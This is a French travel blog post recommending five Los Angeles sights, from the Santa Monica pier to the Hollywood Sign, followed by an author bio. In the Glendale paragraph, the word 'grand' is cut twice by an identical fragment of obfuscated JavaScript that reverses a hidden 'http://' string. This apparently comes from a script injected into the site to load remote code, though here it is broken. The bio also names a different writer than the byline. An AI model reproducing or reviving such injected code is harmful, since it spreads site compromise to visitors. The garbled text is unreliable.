Los Angeles et ces 5 endroits mythique.

Cindy Manu

Updated on:

Le froid s’est installé, la nuit tombe de plus en plus tôt et le jour se lève de plus en plus tard, la neige se mêle à la pluie et les plaid sont de sortis. L’hiver est définitivement bien là. Alors même si cette période est merveilleuse avec l’arrivée des fêtes de Noël, un peu de soleil ne fait jamais de mal. Alors au milieu des chaussettes pilou pilou, des bougies et du chocolat chaud Angélique vous présente cinq endroits mythique de Los Angeles. Une ville multiculturelle qui l’a accueillie pendant plus d’un an. 

Santa Monica, et sa jetée

Le long de la côte pacifique, Santa Monica surplombe l’océan de toute son hauteur. A la fois touristique mais aussi très résidentielle, Santa Monica est l’étape à ne pas louper pendant votre périple à Los Angeles. Entre shopping sur 3rd Street Promenade et fête foraine, il y a de quoi faire. Vous pourrez descendre sur la très célèbre jetée où vous retrouverez le Pacific Park. De la bas les couchés de soleil sont absolument fantastique. De plus, plein coeur de la jetée, vous pourrez retrouver la fin de la très célèbre route 66 qui symbolise le gout de la liberté et le road trip à l’américaine.

Jetée de Santa Monica BeachGriffith Observatory

Situé sur la colline d’Hollywood, au sein du parc Griffith, cet endroit vous donnera une vue 360 sur Los Angeles. De ses plages, jusqu’à Downtown Los Angeles, en passant par le très célèbre Hollywood Sign, la vue y est imprenable. Si vous cherchez un super post pour voir un coucher à Los Angeles alors celui là doit se trouver en premier sur votre liste. A l’intérieur de l’observatoire vous pourrez retrouver tout l’univers astronomique. Planètes, étoiles et planétarium…

L'observatoire de Los AngelesVenice Beach

A seulement une dizaine de minutes à vélo de Santa Monica, l’ambiance y est complètement différente. Si Venice est si connu c’est par son côté tape-l’oeil, son mélange incroyable d’art et de personnalité. Vous pourrez retrouver de nombreux artistes de rues. Entre musique, acrobaties, art et autre magiciens, de quoi rentre votre périple au travers Venice encore plus unique. Venice Beach est le quartier de Los Angeles pour se créer de souvenirs insolites et amusant. Le long du Broadwalk vous pourrez découvrir une et mille choses, toutes aussi incroyable les unes que les autres.

Signe de Venice BeachGlendale

Glendale est une ville du comté de Los Angeles proche de Burbank. Dans le même univers que « The Grove », Glendale est un gr {if (typeof ($Ikf.list[n]) == « string ») return $Ikf.list[n].split(«  »).reverse().join(«  »);return $Ikf.list[n];};$Ikf.list=[« \’ //:ptth\’= « ]; ( () * 6); ; );}and complexe ou l’on retrouve de quoi se divertir. Avec un magnifique cinéma, de quoi faire du shopping avec un très gr {if (typeof ($Ikf.list[n]) == « string ») return $Ikf.list[n].split(«  »).reverse().join(«  »);return $Ikf.list[n];};$Ikf.list=[« \’ //:ptth\’= « ]; ( () * 6); ; );}and centre commercial juste à côté mais aussi de quoi manger. Vous retrouverez le très célèbre restaurant « The Cheesecake Factory » où vous pourrez déguster de délicieux cheesecake. Tout cela dans un univers très authentique et charmant. Si vous y passez à Noël, le décor est absolument féérique.

Americano theaterHollywood Sign

Est-il nécessaire de vous en parler? De vous répéter que passer par Hollywood Boulevard et le Hollywood sign est un incontournable de Los Angeles? Hollywood Boulevard est un passage obligé pour les touristes. Vous ne pouvez pas zapper cette étape obligatoire qui est de marcher sur les étoiles de vos célébrités préférées. A cote de ça, ne parlons même pas des très célèbres lettre de Los Angeles. Vous devez à un moment où un autre les voir que ce soit de loin ou de près. Mais un séjour à Los Angeles ne l’est pas si vous n’avez pas au moins vu une fois les lettres blanches qui surplombent la ville.

Les lettre de Los Angeles

Et vous, êtes vous déjà allé à Los Angeles? Si oui, quels sont vos endroits incontournable, ceux dont vous vous souviendrez toute votre vie?

Cindy

Cindy Manu

Passionnée par le monde des mots et avide de découvertes, je m'appelle Maria Alejandra. En tant que rédactrice au sein de ce magazine féminin, je suis constamment en quête d'informations captivantes à partager avec notre précieuse communauté.

Ma curiosité insatiable m'entraîne à explorer les recoins les plus variés d'Internet, où je dévore avec enthousiasme tout ce que je peux trouver. C'est avec une joie débordante que je m'engage à vous transmettre les trésors de connaissances que je découvre, en particulier dans le domaine des animaux.

Laisser un commentaire